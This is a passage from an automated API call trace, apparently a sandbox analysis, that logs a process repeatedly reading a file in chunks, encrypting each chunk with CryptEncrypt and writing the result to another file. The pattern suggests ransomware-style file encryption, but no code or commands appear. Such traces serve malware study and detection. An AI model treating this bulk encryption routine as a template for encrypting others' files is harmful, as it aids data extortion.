lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.666] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.666] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.666] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.666] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.666] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.666] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.666] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.666] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.666] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.666] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.666] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.666] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.666] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.667] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.667] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.667] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.667] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.667] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.667] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.667] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.667] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.667] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.667] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.667] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.667] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.667] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.667] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.668] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.668] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.668] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.668] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.668] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.668] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.668] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.668] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.668] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.668] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.668] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.668] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.669] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.669] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.669] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.669] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.669] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.669] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.669] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.669] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.669] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.669] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.669] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.669] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.669] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.670] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.670] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.670] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.670] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.670] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.670] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.670] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.670] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.670] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.670] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.670] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.670] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.670] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.671] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.671] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.671] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.671] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.671] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.671] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.671] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.671] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.671] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.671] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.671] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.672] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.672] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.672] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.672] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.672] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.672] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.672] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.672] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.672] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.672] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.672] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.672] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.672] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.672] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.673] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.673] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.673] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.673] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.673] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.673] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.673] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.673] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.673] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.673] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, 